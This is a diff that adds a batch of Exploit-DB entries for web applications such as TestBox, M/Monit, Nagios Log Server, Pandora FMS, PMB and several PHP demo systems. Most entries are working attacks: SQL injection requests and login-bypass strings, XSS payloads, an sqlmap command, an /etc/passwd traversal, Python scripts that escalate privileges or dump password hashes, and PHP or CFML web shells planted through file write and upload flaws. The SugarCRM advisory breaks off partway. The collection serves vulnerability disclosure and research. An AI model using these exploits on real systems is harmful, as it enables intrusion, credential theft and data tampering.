+https://www.redteam-pentesting.de/jobs/
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49072.txt b/exploits/multiple/webapps/49072.txt
new file mode 100644
index 000000000..89c99e066
--- /dev/null
+++ b/exploits/multiple/webapps/49072.txt
@@ -0,0 +1,17 @@
+# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS 
+# Date: 2020-11-18
+# Exploit Author: icekam
+# Vendor Homepage: https://www.pescms.com/
+# Software Link: https://github.com/lazyphp/PESCMS-TEAM
+# Version: PESCMS Team 2.3.2
+# CVE:  CVE-2020-28092
+
+PESCMS Team 2.3.2 has multiple reflected XSS via the id
+
+parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=
+
+ please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6
+
+now I input payload :
+
+"><ScRiPt>alert(1)</ScRiPt>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49073.txt b/exploits/multiple/webapps/49073.txt
new file mode 100644
index 000000000..565108687
--- /dev/null
+++ b/exploits/multiple/webapps/49073.txt
@@ -0,0 +1,17 @@
+# Exploit Title: xuucms 3 - 'keywords' SQL Injection
+# Date: 2020-11-18
+# Exploit Author: icekam
+# Vendor Homepage: https://www.cxuu.top/
+# Software Link: https://github.com/cbkhwx/cxuucmsv3
+# Version: cxuucms - v3
+# CVE : CVE-2020-28091
+
+SQL injection exists in search.php. For details, please refer to:
+https://github.com/cbkhwx/cxuucmsv3/issues/1
+
+Use SQLMAP authentication:
+ sqlmap -u 'http://localhost/search.php?keywords=12345678'
+--dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o
+--batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121
+Safari/537.36' -b  --current-db --hostname
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49077.txt b/exploits/multiple/webapps/49077.txt
new file mode 100644
index 000000000..e97a40d6b
--- /dev/null
+++ b/exploits/multiple/webapps/49077.txt
@@ -0,0 +1,79 @@
+# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
+# Author: Darren King
+# Date: 2020-07-23
+# Vendor Homepage: https://www.ortussolutions.com/products/testbox
+# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
+# Version : 2.4.0 through to 4.1.0
+# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61  
+
+About TestBox
+------------------------
+TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be
+downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).
+
+TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, 
+and allows users to run CFML unit tests and to generate reports.
+
+https://www.ortussolutions.com/products/testbox
+https://github.com/Ortus-Solutions/testbox
+
+As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.
+
+Command Injection & RCE
+------------------------
+The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host.
+The block below shows the vulnerable code:
+
+HTMLRunner.cfm, lines 51-73:
+// Write TEST.properties in report destination path.
+if( url.propertiesSummary ){
+	testResult = testbox.getResult();
+	errors = testResult.getTotalFail() + testResult.getTotalError();
+	savecontent variable="propertiesReport"{
+		writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) );
+		writeOutput( "test.labels=#arrayToList( testResult.getLabels() )#
+		test.bundles=#URL.bundles#
+		test.directory=#url.directory#
+		total.bundles=#testResult.getTotalBundles()#
+		total.suites=#testResult.getTotalSuites()#
+		total.specs=#testResult.getTotalSpecs()#
+		total.pass=#testResult.getTotalPass()#
+		total.fail=#testResult.getTotalFail()#
+		total.error=#testResult.getTotalError()#
+		total.skipped=#testResult.getTotalSkipped()#" );
+	}
+
+	//ACF Compatibility - check for and expand to absolute path
+	if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath );
+
+	fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport );
+}
+
+If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed.
+The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output
+a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application. 
+The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and
+not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM
+can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server. 
+(Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.)
+
+Sample URL to write local CFM file:
+http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre>
+
+Sample URL to confirm:
+http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all
+
+Versions Affected
+------------------------
+Versions affected (and platform tested on):
+  - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
+  - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  - Testbox-2.4.0+80-201612030044  (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  
+Timeline
+------------------------
+2020-07-23 - Reserved CVEs
+2020-08-04 - Disclosed issues to vendor
+2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49078.txt b/exploits/multiple/webapps/49078.txt
new file mode 100644
index 000000000..879369548
--- /dev/null
+++ b/exploits/multiple/webapps/49078.txt
@@ -0,0 +1,44 @@
+# Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal
+# Author: Darren King
+# Date: 2020-07-23
+# Vendor Homepage: https://www.ortussolutions.com/products/testbox
+# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
+# Version : 2.3.0 through to 4.1.0
+# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61 
+
+About TestBox
+------------------------
+TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be
+downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).
+
+TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application, 
+and allows users to run CFML unit tests and to generate reports.
+
+https://www.ortussolutions.com/products/testbox
+https://github.com/Ortus-Solutions/testbox
+
+As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.
+
+Directory Traversal
+------------------------
+The TestBox "test-browser" page does not adequately sanitise the "path" QueryString parameter, allowing an attacker
+to perform a directory traversal on the page by specifying the value "path=/../" (appending '../' all the way up to the
+system root).
+
+Sample URL:
+http://<HOST>/testbox/test-browser/index.cfm?path=/../
+
+Versions Affected
+------------------------
+Versions affected (and platform tested on):
+  - Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
+  - Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  - Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  - Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  - Testbox-2.4.0+80-201612030044  (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
+  
+Timeline
+------------------------
+2020-07-23 - Reserved CVEs
+2020-08-04 - Disclosed issues to vendor
+2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49080.py b/exploits/multiple/webapps/49080.py
new file mode 100755
index 000000000..3e41ae389
--- /dev/null
+++ b/exploits/multiple/webapps/49080.py
@@ -0,0 +1,52 @@
+# Title: M/Monit 3.7.4 - Privilege Escalation
+# Author: Dolev Farhi
+# Date: 2020-07-09
+# Vendor Homepage: https://mmonit.com/
+# Version : 3.7.4
+
+import sys
+import requests
+
+url = 'http://your_ip_here:8080'
+username = 'test'
+password = 'test123'
+
+sess = requests.Session()
+sess.get(host)
+
+def login():
+  print('Attempting to login...')
+  data = {
+    'z_username':username,
+    'z_password':password
+  }
+  headers = {
+    'Content-Type':'application/x-www-form-urlencoded'
+  }
+  
+  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
+  if resp.ok:
+    print('Logged in successfully.')
+  else:
+    print('Could not login.')
+    sys.exit(1)
+
+def privesc():
+  data = {
+    'uname':username,
+    'fullname':username,
+    'password':password,
+    'admin':1
+  }
+  resp = sess.post(url + '/api/1/admin/users/update', data=data)
+  
+  if resp.ok:
+    print('Escalated to administrator.')
+  else:
+    print('Unable to escalate to administrator.')
+  
+  return
+
+if __name__ == '__main__':
+  login()
+  privesc()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49081.py b/exploits/multiple/webapps/49081.py
new file mode 100755
index 000000000..88d832b50
--- /dev/null
+++ b/exploits/multiple/webapps/49081.py
@@ -0,0 +1,45 @@
+# Title: M/Monit 3.7.4 - Password Disclosure
+# Author: Dolev Farhi
+# Date: 2020-07-09
+# Vendor Homepage: https://mmonit.com/
+# Version : 3.7.4
+
+import sys
+import requests
+
+url = 'http://your_ip_here:8080'
+username = 'test'
+password = 'test123'
+
+sess = requests.Session()
+sess.get(host)
+
+def login():
+  print('Attempting to login...')
+  data = {
+    'z_username':username,
+    'z_password':password
+  }
+  headers = {
+    'Content-Type':'application/x-www-form-urlencoded'
+  }
+  
+  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
+  if resp.ok:
+    print('Logged in successfully.')
+  else:
+    print('Could not login.')
+    sys.exit(1)
+
+def steal_hashes():
+  resp = sess.get(url + '/api/1/admin/users/list')
+  if resp.ok:
+    for i in resp.json():
+      mmonit_user = i['uname']
+      result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user))
+      mmonit_passw = result.json()['password']
+      print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))
+    
+if __name__ == '__main__':
+  login()
+  steal_hashes()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49082.txt b/exploits/multiple/webapps/49082.txt
new file mode 100644
index 000000000..e6c74054c
--- /dev/null
+++ b/exploits/multiple/webapps/49082.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting
+# Date: 31.08.2020
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://www.nagios.com/
+# Software Link: https://www.nagios.com/products/nagios-log-server/
+# Version: 2.1.7
+# Tested on: Linux/ISO
+
+# Link:
+https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting
+
+# Description
+
+A stored cross-site scripting (XSS) in Nagios Log Server 2.1.7 can result
+in an attacker performing malicious actions to users who open a maliciously
+crafted link or third-party web page.
+
+# PoC
+
+To exploit vulnerability, someone could use a POST request to
+'/nagioslogserver/configure/create_snapshot' by manipulating
+'snapshot_name' parameter in the request body to impact users who open a
+maliciously crafted link or third-party web page.
+
+POST /nagioslogserver/configure/create_snapshot HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)
+Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+DNT: 1
+Connection: close
+Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd;
+ls_session=883lergotgcjbh9bjgaeakosv5go2gbb;
+PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
+Upgrade-Insecure-Requests: 1
+
+csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD]
\ No newline at end of file
diff --git a/exploits/php/webapps/49046.txt b/exploits/php/webapps/49046.txt
new file mode 100644
index 000000000..d6de76906
--- /dev/null
+++ b/exploits/php/webapps/49046.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
+# Date: 11-14-2020
+# Exploit Author: Matthew Aberegg, Alex Prieto
+# Vendor Homepage: https://pandorafms.com/
+# Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 749
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS.  
+# Vulnerable Parameter : data
+
+
+# POC
+
+POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 23
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+
+page=general%2Fcg_items
\ No newline at end of file
diff --git a/exploits/php/webapps/49048.txt b/exploits/php/webapps/49048.txt
new file mode 100644
index 000000000..f3a3d8330
--- /dev/null
+++ b/exploits/php/webapps/49048.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
+# Date: 2020-11-14
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
+# Version: 1.0
+# Tested on: Apache2 and Windows 10
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/WBS/user.php
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+
+
+
+
+-------------------------------------------------------------------------
+
+Source Code: edituser.php
+
+..
+..
+..
+$user_id =$_REQUEST['id'];
+$result = mysqli_query($conn,"SELECT * FROM user WHERE id  = '$user_id'");
+..
+..
+
+-------------------------------
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 163
+Origin: http://localhost
+Connection: close
+Cookie: COOKIE
+Upgrade-Insecure-Requests: 1
+-------------------------------------------------------------------------
+
+Source Code: \WBS\viewbill.php
+
+..
+..
+..
+$id =$_REQUEST['id'];
+$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
+..
+..
+
+-------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49052.txt b/exploits/php/webapps/49052.txt
new file mode 100644
index 000000000..1085596b6
--- /dev/null
+++ b/exploits/php/webapps/49052.txt
@@ -0,0 +1,29 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection 
+# Date: 2020–11–14
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on POPOs(Linux)
+
+SQL Injection:
+SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection quiries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/loginsystem/admin/
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: ' or '1'='1
+
+3. Server accepted our payload and we bypassed admin panel without any credentials, 
+
+IMPACT:
+if any attacker can gain admin panel access than they can Update & Delete Userdata 
+
+Suggested Mitigation/Remediation Actions
+Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas were the application or other applications in the organization are vulnerable to this attack.
+Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection.
\ No newline at end of file
diff --git a/exploits/php/webapps/49054.txt b/exploits/php/webapps/49054.txt
new file mode 100644
index 000000000..014360023
--- /dev/null
+++ b/exploits/php/webapps/49054.txt
@@ -0,0 +1,23 @@
+# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
+# Date: 2020-10-13
+# Google Dork: inurl:opac_css
+# Exploit Author: 41-trk (Tarik Bakir)
+# Vendor Homepage: http://www.sigb.net
+# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
+# Affected versions : <= 5.6 
+# Tested on: Ubuntu 18.04.1
+
+The PMB Gif Image is not sanitizing the 'chemin',
+which leads to Local File Disclosure.
+
+As of today (2020-10-13) this issue is unfixed.
+
+Vulnerable code: (getgif.php )
+
+line 55    $fp2=@fopen($chemin, "rb");
+line 68    fpassthru($fp)
+
+
+========================= Proof-of-Concept ===================================================
+
+    http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
\ No newline at end of file
diff --git a/exploits/php/webapps/49055.txt b/exploits/php/webapps/49055.txt
new file mode 100644
index 000000000..2a8589a68
--- /dev/null
+++ b/exploits/php/webapps/49055.txt
@@ -0,0 +1,65 @@
+# Exploit Title: Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
+# Date: 2020-11.13
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Apache2 - Windows 10
+
+Vulnerable param: img
+-------------------------------------------------------------------------
+POST /car_rental/admin/ajax.php?action=save_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------30709612614161811513297969444
+Content-Length: 777
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/car_rental/admin/index.php?page=site_settings
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="name"
+
+Car Rental Management System
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="email"
+
+info@sample.comm
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="contact"
+
++6948 8542 623
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="about"
+
+content
+
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="img"; filename="k.php"
+Content-Type: application/octet-stream
+
+<?php echo passthru($_GET['k']);?>
+-----------------------------30709612614161811513297969444--
+
+
+Source Code:
+
+admin\admin_class.php:
+--------------------------------------------------------------------
+                if($_FILES['img']['tmp_name'] != ''){
+                                                                                                                $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
+                                                                                                                $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
+                                                                                                                $data .= ", avatar = '$fname' ";
+
+                                                }
+
+--------------------------------------------------------------------
+
+POC:
+http://{site]/admin/assets/uploads/{FILE}.php?k=whoami
\ No newline at end of file
diff --git a/exploits/php/webapps/49056.txt b/exploits/php/webapps/49056.txt
new file mode 100644
index 000000000..6611f0b70
--- /dev/null
+++ b/exploits/php/webapps/49056.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
+# Date: 2020-11.13
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Apache2 - Windows 10
+
+Vulnerable param: car_id
+-------------------------------------------------------------------------
+GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Source Code:
+
+booking.php:
+--------------------------------------------------------------------
+<?php
+$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
+foreach($qry->fetch_array() as $k => $val){
+                $$k=$val;
+}
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Source Code:
+
+view_car.php:
+--------------------------------------------------------------------
+<?php
+if(isset($_GET['id'])){
+if(isset($_GET['id'])){
+$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);
\ No newline at end of file
diff --git a/exploits/php/webapps/49058.txt b/exploits/php/webapps/49058.txt
new file mode 100644
index 000000000..913e708f0
--- /dev/null
+++ b/exploits/php/webapps/49058.txt
@@ -0,0 +1,43 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
+# Date: 17-11-2020
+# Exploit Author: Kislay Kumar
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/
+# Version: N/A (Default)
+# Tested on: Kali Linux
+
+SQL Injection:
+SQL injection is a web security vulnerability that allows an attacker
+to alter the SQL queries made to the database. This can be used to
+retrieve some sensitive information, like database structure, tables,
+columns, and their underlying data.
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queri=
+es.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/admin/login.html
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed admin panel without any
+credentials,
+
+IMPACT:
+if any attacker can gain admin panel access than they can Update &
+Delete Userdata
+
+Suggested Mitigation/Remediation Actions
+Parameterized queries should be used to separate the command and data
+portions of the intended query to the database. These queries prevent
+an attacker from tampering with the query logic and extending a
+concatenated database query string. Code reviews should be conducted
+to identify any additional areas were the application or other
+applications in the organization are vulnerable to this attack.
+Additionally, input validation should be enforced on the server side
+in order to ensure that only expected data is sent in queries. Where
+possible security specific libraries should be used in order to
+provide an additional layer of protection.
\ No newline at end of file
diff --git a/exploits/php/webapps/49059.txt b/exploits/php/webapps/49059.txt
new file mode 100644
index 000000000..fd53a530a
--- /dev/null
+++ b/exploits/php/webapps/49059.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
+# Google Dork: N/A
+# Date: 11/16/2020
+# Exploit Author: Ramil Mustafayev
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip
+# Version: 1.0
+# Tested on: Win10 x64, Kali Linux x64
+# CVE : N/A
+######## Description ########
+# 
+# An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System.
+#
+# In getuser.php file, GET parameter 'q' is vulnerable.
+#
+# The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection. 
+# 
+#############################
+
+Vulnerable code: 
+
+include_once 'assets/conn/dbconnect.php';
+$q = $_GET['q']; // Vulnerable param
+// echo $q;
+$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point
+
+Used Payload:
+
+http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23
+
+Output:
+
+Extracted database: qbqvqdb_healthcareqvbxq
\ No newline at end of file
diff --git a/exploits/php/webapps/49060.txt b/exploits/php/webapps/49060.txt
new file mode 100644
index 000000000..dae5af311
--- /dev/null
+++ b/exploits/php/webapps/49060.txt
@@ -0,0 +1,366 @@
+# Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-16
+# Vendor Homepage: https://www.sugarcrm.com
+# Version: 6.5.18
+
+Document Title:
+===============
+SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2249
+
+
+Release Date:
+=============
+2020-11-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2249
+
+
+Common Vulnerability Scoring System:
+====================================
+5.1
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+SugarCRM empowers your marketing, sales and services teams to
+collaborate across the entire customer lifecycle for more
+meaningful, memorable experiences. More than 2 million users in 120
+countries have switched to SugarCRM to fuel extraordinary
+customer experiences. We have disrupted the market with a relentless
+pursuit of innovation and visionary solutions,
+bringing the world’s first no-touch, time-aware CX platform. The CX
+suite aggregates the millions of different data points
+on your customers and turns them into proactive truths, trends and
+predictions for you to leverage.
+
+(Copy of the Homepage: https://www.sugarcrm.com )
+
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+cross site scripting web vulnerability in the official SugarCRM v6.5.18
+web-application.
+
+
+Affected Product(s):
+====================
+SugarCRM
+Product: SugarCRM v6.5.18 - CRM (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
